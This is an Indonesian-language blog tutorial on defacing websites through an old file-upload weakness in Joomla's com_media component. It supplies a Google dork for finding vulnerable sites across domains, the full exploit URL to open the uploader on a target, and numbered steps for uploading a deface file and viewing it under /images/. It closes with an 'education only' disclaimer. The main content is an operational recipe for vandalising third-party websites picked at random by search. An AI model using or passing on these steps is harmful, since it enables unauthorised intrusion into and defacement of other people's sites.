Deface Website dengan Exploit com_media Joomla

✅ Cara Deface Website dengan Exploit com_media Joomla

🔍 Apa Itu com_media di Joomla?

com_media adalah komponen default di CMS Joomla yang digunakan untuk manajemen file media (gambar, dokumen, dsb). Namun, versi lama dari komponen ini memiliki celah upload file yang dapat dieksploitasi untuk meng-upload script deface.

🧪 Bahan-Bahan yang Diperlukan

• ✅ Script deface berekstensi .txt, .jpg, atau .png
• ✅ Browser / cURL / HTTP Client (contoh: Chrome, BurpSuite, curl)
• ✅ Dork Google untuk mencari target rentan

🔎 Dork Google untuk Mencari Target

inurl:com_media site:.com

Tips:

• Ganti site:.com jadi .id, .org, dll sesuai target
• Gunakan mode incognito untuk hasil lebih bersih

💣 URL Exploit com_media

Gunakan path berikut untuk mengecek apakah uploader aktif:

/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

Contoh lengkap URL:

https://target.com/index.php?option=com_media&view=images&tmpl=component&fieldid=&e_name=jform_articletext&asset=com_content&author=&folder=

⚠️ Jika terbuka form upload, kemungkinan besar target vulnerable.

🚀 Langkah-Langkah Eksploitasi

1. Buka URL exploit di browser.
2. Pastikan muncul form uploader.
3. Upload file .txt, .jpg, atau .png yang berisi script deface.
4. Cek file yang berhasil diupload, biasanya berada di direktori /images/
5. Akses URL file misalnya: https://target.com/images/namafile.jpg
6. Jika muncul halaman deface → BERHASIL!

📌 Catatan Penting

• Joomla versi terbaru sudah menutup celah ini.
• Upload .php akan ditolak → gunakan .txt atau .jpg dengan kode HTML.

🧠 blog lama

Tutorial ini dari blog lama ku:
https://synister7.blogspot.com/2018/11/cara-deface-menggunakan-exploit-commedia.html

⚠️ Disclaimer

Artikel ini hanya untuk edukasi dan tujuan pentesting legal. Segala penyalahgunaan bukan tanggung jawab penulis.